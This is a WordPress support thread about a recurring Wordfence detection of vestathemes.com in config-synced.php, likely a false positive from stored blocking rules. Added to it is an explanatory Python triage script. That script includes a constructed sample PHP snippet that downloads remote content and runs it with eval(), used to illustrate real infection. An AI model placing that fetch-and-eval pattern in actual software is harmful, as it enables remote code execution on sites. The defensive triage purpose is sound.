• Resolved SJ

    (@sunsta)


    Hi, I'm running into a recurring issue after the Wordfence malware scan. There is no theme or plugin installed from vestathemes.com. I have selected to delete this file 3 times, successfully – but then it comes back again – how do I remove this permanently? Please see details below:

    Filename: public_html/wp-content/wflogs/config-synced.php

    Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: vestathemes.com

    The issue type is: IOC:PHP/VestaThemes.13991
    Description: VestaThemes.com is a nulled theme/plugin distributor. Their plugins/themes contain malware, therefore your site is likely to be infected

Viewing 9 replies - 1 through 9 (of 9 total)
  • Plugin Support wfpeter

    (@wfpeter)

    Hi @sunsta, thanks for reaching out about this.

    It does seem strange on the face of things that a vestathemes detection would happen in Wordfence’s wflogs folder, but I’d need to look into it a little closer. This scan result would also show up in your diagnostic report, which I can check and pass on to our Threat Intelligence team if I can’t see a clear cause myself.

    You can send that to wftest @ wordfence . com directly from the link at the top of the Wordfence > Tools > Diagnostics page. Then click on “Send Report by Email”. Please add your forum username where indicated and respond here after you have sent it.

    NOTE: It should look as follows – Screenshot of Tools > Diagnostic > Send by Email

    Many thanks,
    Peter.

    Thread Starter SJ

    (@sunsta)

    Thank you so much for your reply, Peter.
    I have sent the diagnostics report via email as instructed.
    Appreciate the support!

    Plugin Support wfpeter

    (@wfpeter)

    Hi @sunsta, thanks for sending that over.

    I’m seeing 0 scan issues in that diagnostic which would suggest that has now been cleared. Are you not seeing the message in your latest site scan or have you ignored/repaired from the last time?

    Thanks again,
    Peter.

    Thread Starter SJ

    (@sunsta)

    Hi Peter,

    I have deleted the file earlier, before I reached out to support today.

    The thing is, I delete the file successfully, but the next day I get another notification:

    Critical Problems:
    * File appears to be malicious or unsafe: wp-content/wflogs/config-synced.php

    Plugin Support wfpeter

    (@wfpeter)

    Hi @sunsta, thank you for clarifying.

    Our Threat Intelligence team recommend sending your current config-synced.php to samples @ wordfence . com. They should be able to analyze the file and get back to you if there are any recommended actions from there.

    We don’t believe a threat is likely in this case as “Advanced blocking” settings are included in that file. If your site has blocked Referers, User-Agents, etc. including “vestathemes.com”, it may be down to our signature being too sensitive, but it can be easily rectified once we know for sure.

    Thanks for your assistance,
    Peter.
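The explanation above describes a classic IOC string-signature false positive: the signature looks for the literal text "vestathemes.com", and a Wordfence config file that stores your own Advanced Blocking patterns will contain that literal without containing any executable code. The following is an added example (not Wordfence's scanner and not code from anyone in this thread) showing why context matters when triaging such a hit. It splits a PHP file into executable regions and data regions (text outside `<?php ... ?>` tags, and everything after `__halt_compiler()`), then reports whether each match lands in code or in data. The file contents, the serialized setting name `blockedReferers`, and the stub-then-blob layout of config-synced.php are all constructed assumptions for illustration.

```python
"""Triage an IOC string hit by where it lands inside a PHP file.

Added example: a substring signature such as "vestathemes.com" fires on any
byte sequence, so a blocking rule stored as data looks identical to a
backdoor that contacts that host. Knowing which region the match sits in is
the first thing a responder checks before deleting the file.
"""

PHP_OPEN = "<?php"
PHP_CLOSE = "?>"
HALT = "__halt_compiler()"

VERDICT_CLEAN = "clean: no match"
VERDICT_DATA_ONLY = "likely false positive: match only in data region"
VERDICT_CODE = "review: match inside executable PHP"


def php_regions(content: str) -> list[tuple[int, int, str]]:
    """Return (start, end, kind) spans, kind being 'code' or 'data'.

    Text outside PHP tags is inline data. Once __halt_compiler() is reached
    the rest of the file is raw data even if a later '?>' appears, which is
    exactly how config-synced.php style files embed their settings blob.
    """
    regions: list[tuple[int, int, str]] = []
    pos = 0
    while pos < len(content):
        open_at = content.find(PHP_OPEN, pos)
        if open_at == -1:
            regions.append((pos, len(content), "data"))
            break
        if open_at > pos:
            regions.append((pos, open_at, "data"))
        halt_at = content.find(HALT, open_at)
        close_at = content.find(PHP_CLOSE, open_at)
        if halt_at != -1 and (close_at == -1 or halt_at < close_at):
            boundary = halt_at + len(HALT)
            # the ';' or '?>' that terminates __halt_compiler() is still code
            if content.startswith(";", boundary):
                boundary += 1
            elif content.startswith(PHP_CLOSE, boundary):
                boundary += len(PHP_CLOSE)
            regions.append((open_at, boundary, "code"))
            regions.append((boundary, len(content), "data"))
            break
        if close_at == -1:
            regions.append((open_at, len(content), "code"))
            break
        regions.append((open_at, close_at + len(PHP_CLOSE), "code"))
        pos = close_at + len(PHP_CLOSE)
    return regions


def scan(content: str, ioc: str) -> list[tuple[int, str]]:
    """Return (offset, region_kind) for every occurrence of ioc."""
    hits: list[tuple[int, str]] = []
    for start, end, kind in php_regions(content):
        at = content.find(ioc, start)
        while at != -1 and at < end:
            hits.append((at, kind))
            at = content.find(ioc, at + 1)
    return hits


def verdict(content: str, ioc: str) -> str:
    """Summarise the hits into the call a responder actually needs."""
    hits = scan(content, ioc)
    if not hits:
        return VERDICT_CLEAN
    if any(kind == "code" for _, kind in hits):
        return VERDICT_CODE
    return VERDICT_DATA_ONLY


# Constructed stand-in for wp-content/wflogs/config-synced.php: an access
# guard stub followed by a serialized settings blob that carries an
# Advanced Blocking referer pattern. Layout and key name are assumptions.
CONFIG_SYNCED = (
    "<?php exit('Access denied'); __halt_compiler(); ?>"
    'a:1:{s:15:"blockedReferers";s:17:"*vestathemes.com*";}'
)

# Constructed sample of what the signature is meant to catch: the same
# string inside executable PHP that fetches and runs remote content.
INFECTED_THEME_FILE = (
    "<?php\n"
    "$remote = 'http://vestathemes.com/update.txt';\n"
    "$payload = @file_get_contents($remote);\n"
    "if ($payload) { eval($payload); }\n"
)

if __name__ == "__main__":
    for name, sample in (("config-synced.php", CONFIG_SYNCED),
                         ("functions.php", INFECTED_THEME_FILE)):
        print(f"{name}: {verdict(sample, 'vestathemes.com')}")
```

On a live site the equivalent manual check is to open the flagged file and see where the matched string sits: a match inside the serialized blob after the `exit(...); __halt_compiler();` stub is a stored setting, and deleting the file only makes Wordfence regenerate it from your configuration, which is why it keeps coming back. A match inside PHP that is actually executed is the case the signature exists for and deserves a proper look.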

    Thread Starter SJ

    (@sunsta)

    Hi Peter, thank you for your feedback. I will send it through. Is there anything specific I should mention or reference?

    Plugin Support wfpeter

    (@wfpeter)

    Hi @sunsta,

    You can reference this topic and a small summary so they know the context around why you’re sending the file, but that should be sufficient to take it from there.

    Peter.

    Thread Starter SJ

    (@sunsta)

    Hi Peter,

    Your assistance is so much appreciated, thank you.

    Plugin Support wfpeter

    (@wfpeter)

    No worries @sunsta, thanks for getting in touch. I will close this topic now as you should receive further correspondence directly – but you’re welcome to start a new topic any time you have Wordfence questions in future.

    Peter.

  • The topic ‘IOC:PHP/VestaThemes.13991 malware scan’ is closed to new replies.